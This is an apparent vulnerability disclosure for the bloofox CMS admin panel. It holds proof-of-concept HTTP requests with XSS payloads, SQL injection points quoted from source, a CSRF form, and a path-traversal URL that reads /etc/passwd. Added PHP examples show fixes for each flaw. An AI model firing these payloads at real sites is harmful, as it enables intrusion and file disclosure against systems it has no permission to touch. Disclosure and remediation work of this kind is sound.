In the last few days I saw that someone had found a few vulnerabilities in a CMS I presented at my course.
I decided to check it again, and below you will find some information about it ;)
Enjoy.
All vulnerabilities were found as a logged-in admin user. I didn't build the site ;)
1. Multiple XSS via MySQL error messages:
Parameters:
lang_id, blocked, tmpl_id, urls, mod_rewrite, meta_charset,
meta_doctype, default_group, u1, u2, u7, u4, u30, u40, u8, u3, u5, u9,
u20, status, group_id, page, backend, content, settings, permissions,
tools, demo, object_w, object_d
Example request:
---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116
title=asdasd&text=asdasd&insert=top&blocked='"%3e%3cbody%2fonload%3dalert(3)%3e&startdate=&enddate=&send=Add+Article
---<request>---
And:
---<response>---
HTTP/1.1 200 OK
Date: Thu, 30 Jan 2014 12:46:16 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 448
Connection: close
Content-Type: text/html
</td></table><b>Database error:</b> Invalid SQL: INSERT INTO bfCMS_sys_content VALUES ('','','99965','','','asdasd','asdasd',''"><body/onload=alert(3)>','admin','1391085976','','','','')<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(3)>','admin','1391085976','','','','')' at line 1)<br>
<br>
Session halted.
---<response>---
2. CSRF (when adding a project)
---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host:
(...)
Content-Length: 229
name=asdasd&lang_id=1&tmpl_id=1&urls=<CSRF_IS_POSSIBLE_HERE>&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---
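The form above carries no anti-forgery token, so the same POST can be replayed from any origin while the admin is logged in. As an added example (not bloofox code), this is a synchronizer-token guard for such an admin form; the function names `csrf_token`/`csrf_verify`, the hidden field name and the form markup are assumptions.

```php
<?php
// Added example (not bloofox code): minimal synchronizer-token CSRF guard
// for a state-changing admin form such as "Add Project".
// Assumed helper names: csrf_token(), csrf_verify(); PHP 7+ session.

session_start();

// Issue one random token per session and reuse it for the session lifetime.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the stored one in constant time.
function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token.');
    }
    // ... handle the validated "Add Project" request here ...
}

// The form must carry the token as a hidden field; escape it on output.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="index.php?mode=settings&amp;page=projects&amp;action=new">';
echo '  <input type="hidden" name="csrf_token" value="' . $token . '">';
echo '  <input type="text" name="name">';
echo '  <input type="submit" name="send" value="Add Project">';
echo '</form>';
```

Setting the session cookie with `SameSite=Lax` or `Strict` (`session_set_cookie_params` in PHP 7.3+) is a useful second layer, but it does not replace the token: older clients ignore the attribute, and the check above must stay on every state-changing handler, not only the one shown.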
3. Multiple SQL Injections
---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 263
name=asdasd&lang_id='"%3e%3cbody%2fonload%3dalert(3)%3e&tmpl_id=1&urls=asdasd&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---
Or here:
---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116
title=asdasd&text=asdasd&insert=top&blocked='HERE&startdate=&enddate=&send=Add+Article
---<request>---
Or here:
---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=plugins&action=edit HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 58
status='"%3e%3cbody%2fonload%3dalert(3)%3e&pid=1&send=Save
---<request>---
Parameters:
a) tmpl_id
---<code>---
./system/class_admincenter.php:119:
$db->query("SELECT name FROM ".$tbl_prefix."sys_template WHERE tid = '".$tmpl_id."' ORDER BY tid");
---<code>---
b) urls
---<code>---
./admin/include/inc_settings_projects.php:130:
$db->query("UPDATE ".$tbl_prefix."sys_config SET urls = '".$_POST['urls']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---
c) lang_id
---<code>---
./system/class_admincenter.php:104:
$db->query("SELECT name FROM ".$tbl_prefix."sys_lang WHERE lid = '".$lang_id."' ORDER BY lid");
---<code>---
d) mod_rewrite
---<code>---
./admin/include/inc_settings_projects.php:146:
$db->query("UPDATE ".$tbl_prefix."sys_config SET mod_rewrite = '".$_POST['mod_rewrite']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---
e) meta_charset
---<code>---
./admin/include/inc_settings_projects.php:142:
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_charset = '".$_POST['meta_charset']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---
f) meta_doctype
---<code>---
./admin/include/inc_settings_projects.php:143:
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_doctype = '".$_POST['meta_doctype']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---
g) default_group
---<code>---
./plugins/register_form_simple/register.php:
121: $db2->query("SELECT name FROM ".$tbl_prefix."sys_usergroup WHERE gid = '".$sys_config_vars["default_group"]."' ORDER BY gid");
---<code>---
h) from 'u1' to 'u11' and also u20, u30, u40 parameters
---<code>---
k@lab:~/public_html/bloofox$ grep -n -r -e "UPDATE" ./ | grep "sys_setting SET setting_value =" | grep POST
./admin/include/inc_settings_general.php:27: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u1']."' WHERE sid = '1' LIMIT 1");
./admin/include/inc_settings_general.php:28: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u2']."' WHERE sid = '2' LIMIT 1");
./admin/include/inc_settings_general.php:29: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u3']."' WHERE sid = '3' LIMIT 1");
./admin/include/inc_settings_general.php:30: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u4']."' WHERE sid = '4' LIMIT 1");
./admin/include/inc_settings_general.php:31: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u5']."' WHERE sid = '5' LIMIT 1");
./admin/include/inc_settings_general.php:35: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u6']."' WHERE sid = '6' LIMIT 1");
./admin/include/inc_settings_general.php:41: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u7']."' WHERE sid = '7' LIMIT 1");
./admin/include/inc_settings_general.php:42: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u8']."' WHERE sid = '8' LIMIT 1");
./admin/include/inc_settings_general.php:43: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u9']."' WHERE sid = '9' LIMIT 1");
./admin/include/inc_settings_general.php:47: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u10']."' WHERE sid = '10' LIMIT 1");
./admin/include/inc_settings_general.php:57: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u12']."' WHERE sid = '12' LIMIT 1");
./admin/include/inc_settings_general.php:65: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u20']."' WHERE sid = '20' LIMIT 1");
./admin/include/inc_settings_general.php:66: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u30']."' WHERE sid = '30' LIMIT 1");
./admin/include/inc_settings_general.php:67: $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u40']."' WHERE sid = '40' LIMIT 1");
k@lab:~/public_html/bloofox$
---<code>---
i) status
---<code>---
./admin/include/inc_user_user.php:
434: $db->query("SELECT uid FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."'");
./admin/include/inc_user_user.php:
442: $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."' ORDER BY uid LIMIT ".$start.",".$limit."");
---<code>---
j) pid
---<code>---
./admin/include/inc_settings_plugins.php:
137: $db->query("SELECT pid,name,status FROM ".$tbl_prefix."sys_plugin WHERE pid = '".$_GET['pid']."' ORDER BY pid LIMIT 1");
---<code>---
Also:
backend, content, settings, permissions, tools, demo, object_w, object_d
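Every listing above builds the SQL by concatenating `$_POST`/`$_GET`/`$_SESSION` values into a quoted literal, and the failed query is then echoed back with the input intact, which is also where the error-message XSS in section 1 comes from. As an added example (not bloofox code), here is the `urls` update and the `tmpl_id` lookup rewritten with PDO prepared statements and an error path that logs instead of echoing. The `$pdo` connection, the function names `update_project_urls`/`template_name`, the credentials and the `bfCMS_` prefix (taken from the error in section 1) are assumptions.

```php
<?php
// Added example (not bloofox code): the concatenation pattern from the
// listings beside a hardened version using PDO prepared statements.
// $pdo, the function names and the connection string are assumptions.

// --- vulnerable pattern (shape of inc_settings_projects.php:130) ---
// $db->query("UPDATE ".$tbl_prefix."sys_config SET urls = '".$_POST['urls']."'
//             WHERE cid = '".$_POST['cid']."' LIMIT 1");
// A quote inside $_POST['urls'] ends the string literal, and the broken
// query is printed back to the browser together with the raw input.

// --- hardened version ---
function update_project_urls(PDO $pdo, string $tbl_prefix, $cid, string $urls): int
{
    // Identifiers cannot be bound; the prefix must come from config, never from the request.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $tbl_prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    // cid is an integer key: validate it before it reaches the query at all.
    if (filter_var($cid, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('cid must be an integer');
    }
    $stmt = $pdo->prepare("UPDATE {$tbl_prefix}sys_config SET urls = :urls WHERE cid = :cid LIMIT 1");
    $stmt->bindValue(':urls', $urls, PDO::PARAM_STR);   // data travels separately from the SQL text
    $stmt->bindValue(':cid', (int)$cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Integer-only lookups (tmpl_id, lang_id, pid, the status filter) get the same treatment.
function template_name(PDO $pdo, string $tbl_prefix, $tmpl_id): ?string
{
    if (filter_var($tmpl_id, FILTER_VALIDATE_INT) === false) {
        return null;
    }
    $stmt = $pdo->prepare("SELECT name FROM {$tbl_prefix}sys_template WHERE tid = :tid");
    $stmt->bindValue(':tid', (int)$tmpl_id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Error handling: keep the detail server-side, never echo the SQL or the input.
try {
    $pdo = new PDO('mysql:host=localhost;dbname=bloofox;charset=utf8mb4', 'user', 'pass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
    ]);
    update_project_urls($pdo, 'bfCMS_', $_POST['cid'] ?? '', $_POST['urls'] ?? '');
} catch (PDOException $e) {
    error_log('DB error in projects/new: ' . $e->getMessage());
    http_response_code(500);
    echo '<b>Database error.</b> The request could not be completed.';
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

The `status` and `pid` cases are the same fix with `$_SESSION["filter_user"]` and `$_GET['pid']` as the bound value; a session value is not safer than a request value once it was populated from one.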
4. Local file include:
http://ip/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl=../../../../../../../../../../../../../../etc/passwd
Code:
---
k@lab:~/public_html/bloofox$ cat -n admin/include/inc_settings_editor.php |less
(...)
60 if(isset($_GET["fileurl"])) {
61 $fileurl = "../".$_GET["fileurl"]; [1]
62 }
63
64 if(file_exists($fileurl)) {
65 $filelength = filesize($fileurl);
66 $readfile = fopen($fileurl,"r"); [2]
67 $file = fread($readfile,$filelength);
68 fclose($readfile);
69 }
(...)
---
5. XSS over GET:
http://10.149.14.77/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl='><body onload=alert(1)>
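The editor code in section 4 prepends `../` to `fileurl` and opens whatever `file_exists()` accepts, and the same parameter is reflected unescaped in section 5. As an added example (not bloofox code), this is a replacement for that block which confines the path to one directory with `realpath()` and escapes the name on output. The editor root `EDITOR_ROOT`, the extension whitelist and the function name `safe_editor_path` are assumptions.

```php
<?php
// Added example (not bloofox code): hardened replacement for the fileurl
// handling in inc_settings_editor.php. EDITOR_ROOT, ALLOWED_EXT and the
// function name are assumptions.

const EDITOR_ROOT = __DIR__ . '/../templates';           // assumed directory the editor may touch
const ALLOWED_EXT = ['html', 'htm', 'css', 'tpl', 'txt']; // assumed editable file types

// Resolve the requested name and confirm it stays inside EDITOR_ROOT.
// Returns the canonical path, or null when the request must be refused.
function safe_editor_path(string $fileurl): ?string
{
    $root = realpath(EDITOR_ROOT);
    if ($root === false) {
        return null;
    }
    // Reject empty names, NUL bytes and absolute paths outright;
    // "../" sequences are collapsed by realpath() and caught by the prefix check.
    if ($fileurl === '' || strpos($fileurl, "\0") !== false || $fileurl[0] === '/') {
        return null;
    }
    $candidate = realpath($root . '/' . $fileurl);
    // Must exist, be a regular file and sit below the root (note the trailing separator,
    // so that "/srv/templates2" is not accepted as being under "/srv/templates").
    if ($candidate === false || !is_file($candidate)
        || strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return $candidate;
}

$file  = '';
$shown = '';
if (isset($_GET['fileurl'])) {
    $path = safe_editor_path((string)$_GET['fileurl']);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid file.');
    }
    $file = file_get_contents($path);
    // Reflect the validated, root-relative name, escaped; never the raw parameter.
    $relative = substr($path, strlen(realpath(EDITOR_ROOT)) + 1);
    $shown = htmlspecialchars($relative, ENT_QUOTES, 'UTF-8');
}
echo '<p>Editing: ' . $shown . '</p>';
echo '<textarea name="content">' . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . '</textarea>';
```

Escaping on output fixes the reflected XSS even when the path check fails, because the raw `fileurl` value is never written into the page at all; the 400 branch returns a fixed string.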
And so on... ;)
I suggest you read this source.
It is really interesting. ;)